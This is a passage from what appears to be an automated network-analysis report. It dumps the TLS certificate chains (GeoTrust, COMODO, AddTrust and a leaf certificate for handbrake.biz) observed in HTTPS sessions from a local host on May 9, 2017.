2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://g.symcb.com/crls/gtglobal.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]]] Algorithm: [SHA256withRSA] Signature:0000: 08 4E 04 A7 80 7F 10 16 43 5E 02 AD D7 42 80 F4 .N......C^...B..0010: B0 8E D2 AE B3 EB 11 7D 90 84 18 7D E7 90 15 FB ................0020: 49 7F A8 99 05 91 BB 7A C9 D6 3C 37 18 09 9A B6 I......z..<7....0030: C7 92 20 07 35 33 09 E4 28 63 72 0D B4 E0 32 9C .. .53..(cr...2.0040: 87 98 C4 1B 76 89 67 C1 50 58 B0 13 AA 13 1A 1B ....v.g.PX......0050: 32 A5 BE EA 11 95 4C 48 63 49 E9 99 5D 20 37 CC 2.....LHcI..] 7.0060: FE 2A 69 51 16 95 4B A9 DE 49 82 C0 10 70 F4 2C .*iQ..K..I...p.,0070: F3 EC BC 24 24 D0 4E AC A5 D9 5E 1E 6D 92 C1 A7 ...$$.N...^.m...0080: AC 48 35 81 F9 E5 E4 9C 65 69 CD 87 A4 41 50 3F .H5.....ei...AP?0090: 2E 57 A5 91 51 12 58 0E 8C 09 A1 AC 7A A4 12 A5 .W..Q.X.....z...00A0: 27 F3 9A 10 97 7D 55 03 06 F7 66 58 5F 5F 64 E1 '.....U...fX__d.00B0: AB 5D 6D A5 39 48 75 98 4C 29 5A 3A 8D D3 2B CA .]m.9Hu.L)Z:..+.00C0: 9C 55 04 BF F4 E6 14 D5 80 AC 26 ED 17 89 A6 93 .U........&.....00D0: 6C 5C A4 CC B8 F0 66 8E 64 E3 7D 9A E2 00 B3 49 l\....f.d......I00E0: C7 E4 0A AA DD 5B 83 C7 70 90 46 4E BE D0 DB 59 .....[..p.FN...Y00F0: 96 6C 2E F5 16 36 DE 71 CC 01 C2 12 C1 21 C6 16 .l...6.q.....!..]
Mai 9, 2017 16:25:44.721575022 MESZ44349295216.58.204.129192.168.0.50CN=GeoTrust Global CA, O=GeoTrust Inc., C=USOU=Equifax Secure Certificate Authority, O=Equifax, C=USTue May 21 06:00:00 CEST 2002Tue Aug 21 06:00:00 CEST 2018[[ Version: V3 Subject: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 27620593608073140957439440929253438012688864718977347268272053725994928948867769687165112265058896553974818505070806430256424431940072485024407486246475597522063246121214348496326377341879755851197260401080498544606788760407243324127929930612201002157618691487713632251700065187865963692723720912135393438861302779432180613616167225206519123176430362410262429702404863434904116727055203524505580952824336979641923534005571504410997292144760317953739063178352809680844232935574095508445145910310675421726257114605895831426222686272114090063230017292595425393719031924942422176213538487957041730136782988405751614792953 public exponent: 65537 Validity: [From: Tue May 21 06:00:00 CEST 2002, To: Tue Aug 21 06:00:00 CEST 2018] Issuer: OU=Equifax Secure Certificate Authority, O=Equifax, C=US SerialNumber: [ 12bbe6]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 48 E6 68 F9 2B D2 B2 95 D7 47 D8 23 20 10 4F 33 H.h.+....G.# .O30010: 98 90 9F D4 ....]][2]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.geotrust.com/crls/secureca.crl]]][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 2D 68 74 74 70 73 3A 2F 2F 77 77 77 2E 67 65 .-https://www.ge0010: 6F 74 72 75 73 74 2E 63 6F 6D 2F 72 65 73 6F 75 otrust.com/resou0020: 72 63 65 73 2F 72 65 70 6F 73 69 74 6F 72 79 rces/repository]] ]][5]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]]] Algorithm: [SHA1withRSA] Signature:0000: 76 E1 12 6E 4E 4B 16 12 86 30 06 B2 81 08 CF F0 v..nNK...0......0010: 08 C7 C7 71 7E 66 EE C2 ED D4 3B 1F FF F0 F0 C8 ...q.f....;.....0020: 4E D6 43 38 B0 B9 30 7D 18 D0 55 83 A2 6A CB 36 N.C8..0...U..j.60030: 11 9C E8 48 66 A3 6D 7F B8 13 D4 47 FE 8B 5A 5C ...Hf.m....G..Z\0040: 73 FC AE D9 1B 32 19 38 AB 97 34 14 AA 96 D2 EB s....2.8..4.....0050: A3 1C 14 08 49 B6 BB E5 91 EF 83 36 EB 1D 56 6F ....I......6..Vo0060: CA DA BC 73 63 90 E4 7F 7B 3E 22 CB 3D 07 ED 5F ...sc....>".=.._0070: 38 74 9C E3 03 50 4E A1 AF 98 EE 61 F2 84 3F 12 8t...PN....a..?.]
Mai 9, 2017 16:25:48.631205082 MESZ4434929685.17.25.66192.168.0.50CN=handbrake.biz, OU=PositiveSSL, OU=Domain Control ValidatedCN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Apr 29 02:00:00 CEST 2017Mon Apr 30 01:59:59 CEST 2018[[ Version: V3 Subject: CN=handbrake.biz, OU=PositiveSSL, OU=Domain Control Validated Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 24378134875974158951713261952361346902965564853853505420709545282913265130671990526215297517581546808352604556784984894379733245204507279455518802540831459428078206963637731026331844246308870542162153927757747056637243618612820381081898800832982050988869190643889465082353297039648391405706140399448202019269282701086715969276105497720600650656643681863997206736777688269358957502616446454522452663141852488132309222307609841248799351748789688873721558439452678892112647169736732697174195045318432052386534891979570787328324086387950784903292078233911925501258007940725200306989938031943982559427544145827309616152039 public exponent: 65537 Validity: [From: Sat Apr 29 02:00:00 CEST 2017, To: Mon Apr 30 01:59:59 CEST 2018] Issuer: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 8438ece5 76cefb5b b02efbb8 de304215]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.6449.1.2.2.7][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1D 68 74 74 70 73 3A 2F 2F 73 65 63 75 72 65 ..https://secure0010: 2E 63 6F 6D 6F 64 6F 2E 63 6F 6D 2F 43 50 53 .comodo.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: handbrake.biz DNSName: www.handbrake.biz][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 26 94 AF DF B9 9F 98 08 DF 3E 0D E0 FC F2 05 2A &........>.....*0010: CD A8 57 75 ..Wu]]] Algorithm: [SHA256withRSA] Signature:0000: 0B 08 8B D7 52 6A DA 45 53 99 5C AD 7E EB 01 25 ....Rj.ES.\....%0010: B7 7A FC 47 02 B4 DB BD 82 C8 F0 E2 5E 10 57 0D .z.G........^.W.0020: AE 94 DD 2A 8B 7C EC 49 4C DF C4 C9 13 5E DA B9 ...*...IL....^..0030: F1 86 EA 32 95 71 9F 67 4F 05 6F A6 B5 EC 3E 8E ...2.q.gO.o...>.0040: 55 FB 26 01 31 0A 1E 61 68 34 31 97 CE 1B 1A E7 U.&.1..ah41.....0050: DC 9B 44 3D 93 40 76 C1 6F EB 36 59 2A CF 34 16 ..D=.@v.o.6Y*.4.0060: E1 82 4C 7F 81 E3 60 22 77 0D 36 97 34 C8 22 A8 ..L...`"w.6.4.".0070: 46 30 01 BE F9 3B DF 1E 6E 97 63 34 B3 6D 8D 25 F0...;..n.c4.m.%0080: 92 EC 11 4C A5 36 0C ED 2B FC 4E 68 1B F2 F7 9C ...L.6..+.Nh....0090: 6B 85 44 88 EE 85 85 74 FC E5 85 3E D7 E9 4C 4D k.D....t...>..LM00A0: BD CC 17 EB 92 4E 71 81 26 A3 E3 40 B7 11 54 5C .....Nq.&..@..T\00B0: 12 D4 1A 7C 3E DE 93 39 55 69 7F 75 1C 45 4F 70 ....>..9Ui.u.EOp00C0: 9E FD 07 A7 80 C8 E1 67 E6 42 4F 1C 3E 5E D2 E8 .......g.BO.>^..00D0: D1 C0 50 79 66 A4 E1 15 98 5E 8D 1B 5B 58 C2 73 ..Pyf....^..[X.s00E0: 83 D0 8A 67 C9 B2 A4 D7 9E B5 D2 AF 97 2E A9 22 ...g..........."00F0: 1D E2 91 88 2D DD 5C EB F6 DF F0 6B 31 5F E3 64 ....-.\....k1_.d]
Mai 9, 2017 16:25:48.631205082 MESZ4434929685.17.25.66192.168.0.50CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Feb 12 01:00:00 CET 2014Mon Feb 12 00:59:59 CET 2029[[ Version: V3 Subject: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 2048 bits modulus: 18021508317891126045114383893640587389787314988023771299021472384098480478916503597778296613150634219765052113517870635171403307225477983047468706279013651027886500159485348697094115927961850381525182009137128777951162358715158533528593200093291791323275973789174789209802980910482500744419318360338528025872227868058578212418244189425301367382232973595110901594292490129763308095314503250053957090379265992785603931784956681691284995547158646635183735467516188519673313343149548166538558424521681954529559978463371620234598058977077392872218941503229331579208118464720991080636709101634982701306129953489796945248933 public exponent: 65537 Validity: [From: Wed Feb 12 01:00:00 CET 2014, To: Mon Feb 12 00:59:59 CET 2029] Issuer: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 2b2e6eea d975366c 148a6edb a37c8c07]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSAAddTrustCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSACertificationAuthority.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]]] Algorithm: [SHA384withRSA] Signature:0000: 4E 2B 76 4F 92 1C 62 36 89 BA 77 C1 27 05 F4 1C N+vO..b6..w.'...0010: D6 44 9D A9 9A 3E AA D5 66 66 01 3E EA 49 E6 A2 .D...>..ff.>.I..0020: 35 BC FA F6 DD 95 8E 99 35 98 0E 36 18 75 B1 DD 5.......5..6.u..0030: DD 50 72 7C AE DC 77 88 CE 0F F7 90 20 CA A3 67 .Pr...w..... ..g0040: 2E 1F 56 7F 7B E1 44 EA 42 95 C4 5D 0D 01 50 46 ..V...D.B..]..PF0050: 15 F2 81 89 59 6C 8A DD 8C F1 12 A1 8D 3A 42 8A ....Yl.......:B.0060: 98 F8 4B 34 7B 27 3B 08 B4 6F 24 3B 72 9D 63 74 ..K4.';..o$;r.ct0070: 58 3C 1A 6C 3F 4F C7 11 9A C8 A8 F5 B5 37 EF 10 X<.l?O.......7..0080: 45 C6 6C D9 E0 5E 95 26 B3 EB AD A3 B9 EE 7F 0C E.l..^.&........0090: 9A 66 35 73 32 60 4E E5 DD 8A 61 2C 6E 52 11 77 .f5s2`N...a,nR.w00A0: 68 96 D3 18 75 51 15 00 1B 74 88 DD E1 C7 38 04 h...uQ...t....8.00B0: 43 28 E9 16 FD D9 05 D4 5D 47 27 60 D6 FB 38 3B C(......]G'`..8;00C0: 6C 72 A2 94 F8 42 1A DF ED 6F 06 8C 45 C2 06 00 lr...B...o..E...00D0: AA E4 E8 DC D9 B5 E1 73 78 EC F6 23 DC D1 DD 6C .......sx..#...l00E0: 8E 1A 8F A5 EA 54 7C 96 B7 C3 FE 55 8E 8D 49 5E .....T.....U..I^00F0: FC 64 BB CF 3E BD 96 EB 69 CD BF E0 48 F1 62 82 .d..>...i...H.b.0100: 10 E5 0C 46 57 F2 33 DA D0 C8 63 ED C6 1F 94 05 ...FW.3...c.....0110: 96 4A 1A 91 D1 F7 EB CF 8F 52 AE 0D 08 D9 3E A8 .J.......R....>.0120: A0 51 E9 C1 87 74 D5 C9 F7 74 AB 2E 53 FB BB 7A .Q...t...t..S..z0130: FB 97 E2 F8 1F 26 8F B3 D2 A0 E0 37 5B 28 3B 31 .....&.....7[(;10140: E5 0E 57 2D 5A B8 AD 79 AC 5E 20 66 1A A5 B9 A6 ..W-Z..y.^ f....0150: B5 39 C1 F5 98 43 FF EE F9 A7 A7 FD EE CA 24 3D .9...C........$=0160: 80 16 C4 17 8F 8A C1 60 A1 0C AE 5B 43 47 91 4B .......`...[CG.K0170: D5 9A 17 5F F9 D4 87 C1 C2 8C B7 E7 E2 0F 30 19 ..._..........0.0180: 37 86 AC E0 DC 42 03 E6 94 A8 9D AE FD 0F 24 51 7....B........$Q0190: 94 CE 92 08 D1 FC 50 F0 03 40 7B 88 59 ED 0E DD ......P..@..Y...01A0: AC D2 77 82 34 DC 06 95 02 D8 90 F9 2D EA 37 D5 ..w.4.......-.7.01B0: 1A 60 D0 67 20 D7 D8 42 0B 45 AF 82 68 DE DD 66 .`.g ..B.E..h..f01C0: 24 37 90 29 94 19 46 19 25 B8 80 D7 CB D4 86 28 $7.)..F.%......(01D0: 6A 44 70 26 23 62 A9 9F 86 6F BF BA 90 70 D2 56 jDp&#b...o...p.V01E0: 77 85 78 EF EA 25 A9 17 CE 50 72 8C 00 3A AA E3 w.x..%...Pr..:..01F0: DB 63 34 9F F8 06 71 01 E2 82 20 D4 FE 6F BD B1 .c4...q... ..o..]
Mai 9, 2017 16:25:48.631205082 MESZ4434929685.17.25.66192.168.0.50CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SETue May 30 12:48:38 CEST 2000Sat May 30 12:48:38 CEST 2020[[ Version: V3 Subject: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 4096 bits modulus: 595250832037245141724642107398533641144111340640849154810839512193646804439589382557795096048235159392412856809181253983148280442751106836828767077478502910675291715965426418324395462826337195608826159904332409833532414343087397304684051488024083060971973988667565926401713702437407307790551210783180012029671811979458976709742365579736599681150756374332129237698142054260771585540729412505699671993111094681722253786369180597052805125225748672266569013967025850135765598233721214965171040686884703517711864518647963618102322884373894861238464186441528415873877499307554355231373646804211013770034465627350166153734933786011622475019872581027516832913754790596939102532587063612068091625752995700206528059096165261547017202283116886060219954285939324476288744352486373249118864714420341870384243932900936553074796547571643358129426474424573956572670213304441994994142333208766235762328926816055054634905252931414737971249889745696283503174642385591131856834241724878687870772321902051261453524679758731747154638983677185705464969589189761598154153383380395065347776922242683529305823609958629983678843126221186204478003285765580771286537570893899006127941280337699169761047271395591258462580922460487748761665926731923248227868312659 public exponent: 65537 Validity: [From: Tue May 30 12:48:38 CEST 2000, To: Sat May 30 12:48:38 CEST 2020] Issuer: CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE SerialNumber: [ 2766ee56 eb49f38e abd770a2 fc84de22]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.usertrust.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: AD BD 98 7A 34 B4 26 F7 FA C4 26 54 EF 03 BD E0 ...z4.&...&T....0010: 24 CB 54 1A $.T.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.usertrust.com/AddTrustExternalCARoot.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]]] Algorithm: [SHA384withRSA] Signature:0000: 64 BF 83 F1 5F 9A 85 D0 CD B8 A1 29 57 0D E8 5A d..._......)W..Z0010: F7 D1 E9 3E F2 76 04 6E F1 52 70 BB 1E 3C FF 4D ...>.v.n.Rp..<.M0020: 0D 74 6A CC 81 82 25 D3 C3 A0 2A 5D 4C F5 BA 8B .tj...%...*]L...0030: A1 6D C4 54 09 75 C7 E3 27 0E 5D 84 79 37 40 13 .m.T.u..'.].y7@.0040: 77 F5 B4 AC 1C D0 3B AB 17 12 D6 EF 34 18 7E 2B w.....;.....4..+0050: E9 79 D3 AB 57 45 0C AF 28 FA D0 DB E5 50 95 88 .y..WE..(....P..0060: BB DF 85 57 69 7D 92 D8 52 CA 73 81 BF 1C F3 E6 ...Wi...R.s.....0070: B8 6E 66 11 05 B3 1E 94 2D 7F 91 95 92 59 F1 4C .nf.....-....Y.L0080: CE A3 91 71 4C 7C 47 0C 3B 0B 19 F6 A1 B1 6C 86 ...qL.G.;.....l.0090: 3E 5C AA C4 2E 82 CB F9 07 96 BA 48 4D 90 F2 94 >\.........HM...00A0: C8 A9 73 A2 EB 06 7B 23 9D DE A2 F3 4D 55 9F 7A ..s....#....MU.z00B0: 61 45 98 18 68 C7 5E 40 6B 23 F5 79 7A EF 8C B5 aE..h.^@k#.yz...00C0: 6B 8B B7 6F 46 F4 7B F1 3D 4B 04 D8 93 80 59 5A k..oF...=K....YZ00D0: E0 41 24 1D B2 8F 15 60 58 47 DB EF 6E 46 FD 15 .A$....`XG..nF..00E0: F5 D9 5F 9A B3 DB D8 B8 E4 40 B3 CD 97 39 AE 85 .._......@...9..00F0: BB 1D 8E BC DC 87 9B D1 A6 EF F1 3B 6F 10 38 6F ...........;o.8o]
Mai 9, 2017 16:26:37.713063955 MESZ4434929785.17.25.66192.168.0.50CN=handbrake.biz, OU=PositiveSSL, OU=Domain Control ValidatedCN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Apr 29 02:00:00 CEST 2017Mon Apr 30 01:59:59 CEST 2018[[ Version: V3 Subject: CN=handbrake.biz, OU=PositiveSSL, OU=Domain Control Validated Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 24378134875974158951713261952361346902965564853853505420709545282913265130671990526215297517581546808352604556784984894379733245204507279455518802540831459428078206963637731026331844246308870542162153927757747056637243618612820381081898800832982050988869190643889465082353297039648391405706140399448202019269282701086715969276105497720600650656643681863997206736777688269358957502616446454522452663141852488132309222307609841248799351748789688873721558439452678892112647169736732697174195045318432052386534891979570787328324086387950784903292078233911925501258007940725200306989938031943982559427544145827309616152039 public exponent: 65537 Validity: [From: Sat Apr 29 02:00:00 CEST 2017, To: Mon Apr 30 01:59:59 CEST 2018] Issuer: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 8438ece5 76cefb5b b02efbb8 de304215]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.6449.1.2.2.7][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1D 68 74 74 70 73 3A 2F 2F 73 65 63 75 72 65 ..https://secure0010: 2E 63 6F 6D 6F 64 6F 2E 63 6F 6D 2F 43 50 53 .comodo.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: handbrake.biz DNSName: www.handbrake.biz][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 26 94 AF DF B9 9F 98 08 DF 3E 0D E0 FC F2 05 2A &........>.....*0010: CD A8 57 75 ..Wu]]] Algorithm: [SHA256withRSA] Signature:0000: 0B 08 8B D7 52 6A DA 45 53 99 5C AD 7E EB 01 25 ....Rj.ES.\....%0010: B7 7A FC 47 02 B4 DB BD 82 C8 F0 E2 5E 10 57 0D .z.G........^.W.0020: AE 94 DD 2A 8B 7C EC 49 4C DF C4 C9 13 5E DA B9 ...*...IL....^..0030: F1 86 EA 32 95 71 9F 67 4F 05 6F A6 B5 EC 3E 8E ...2.q.gO.o...>.0040: 55 FB 26 01 31 0A 1E 61 68 34 31 97 CE 1B 1A E7 U.&.1..ah41.....0050: DC 9B 44 3D 93 40 76 C1 6F EB 36 59 2A CF 34 16 ..D=.@v.o.6Y*.4.0060: E1 82 4C 7F 81 E3 60 22 77 0D 36 97 34 C8 22 A8 ..L...`"w.6.4.".0070: 46 30 01 BE F9 3B DF 1E 6E 97 63 34 B3 6D 8D 25 F0...;..n.c4.m.%0080: 92 EC 11 4C A5 36 0C ED 2B FC 4E 68 1B F2 F7 9C ...L.6..+.Nh....0090: 6B 85 44 88 EE 85 85 74 FC E5 85 3E D7 E9 4C 4D k.D....t...>..LM00A0: BD CC 17 EB 92 4E 71 81 26 A3 E3 40 B7 11 54 5C .....Nq.&..@..T\00B0: 12 D4 1A 7C 3E DE 93 39 55 69 7F 75 1C 45 4F 70 ....>..9Ui.u.EOp00C0: 9E FD 07 A7 80 C8 E1 67 E6 42 4F 1C 3E 5E D2 E8 .......g.BO.>^..00D0: D1 C0 50 79 66 A4 E1 15 98 5E 8D 1B 5B 58 C2 73 ..Pyf....^..[X.s00E0: 83 D0 8A 67 C9 B2 A4 D7 9E B5 D2 AF 97 2E A9 22 ...g..........."00F0: 1D E2 91 88 2D DD 5C EB F6 DF F0 6B 31 5F E3 64 ....-.\....k1_.d]
Mai 9, 2017 16:26:37.713063955 MESZ4434929785.17.25.66192.168.0.50CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Feb 12 01:00:00 CET 2014Mon Feb 12 00:59:59 CET 2029[[ Version: V3 Subject: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 2048 bits modulus: 18021508317891126045114383893640587389787314988023771299021472384098480478916503597778296613150634219765052113517870635171403307225477983047468706279013651027886500159485348697094115927961850381525182009137128777951162358715158533528593200093291791323275973789174789209802980910482500744419318360338528025872227868058578212418244189425301367382232973595110901594292490129763308095314503250053957090379265992785603931784956681691284995547158646635183735467516188519673313343149548166538558424521681954529559978463371620234598058977077392872218941503229331579208118464720991080636709101634982701306129953489796945248933 public exponent: 65537 Validity: [From: Wed Feb 12 01:00:00 CET 2014, To: Mon Feb 12 00:59:59 CET 2029] Issuer: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 2b2e6eea d975366c 148a6edb a37c8c07]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSAAddTrustCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSACertificationAuthority.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]]] Algorithm: [SHA384withRSA] Signature:0000: 4E 2B 76 4F 92 1C 62 36 89 BA 77 C1 27 05 F4 1C N+vO..b6..w.'...0010: D6 44 9D A9 9A 3E AA D5 66 66 01 3E EA 49 E6 A2 .D...>..ff.>.I..0020: 35 BC FA F6 DD 95 8E 99 35 98 0E 36 18 75 B1 DD 5.......5..6.u..0030: DD 50 72 7C AE DC 77 88 CE 0F F7 90 20 CA A3 67 .Pr...w..... ..g0040: 2E 1F 56 7F 7B E1 44 EA 42 95 C4 5D 0D 01 50 46 ..V...D.B..]..PF0050: 15 F2 81 89 59 6C 8A DD 8C F1 12 A1 8D 3A 42 8A ....Yl.......:B.0060: 98 F8 4B 34 7B 27 3B 08 B4 6F 24 3B 72 9D 63 74 ..K4.';..o$;r.ct0070: 58 3C 1A 6C 3F 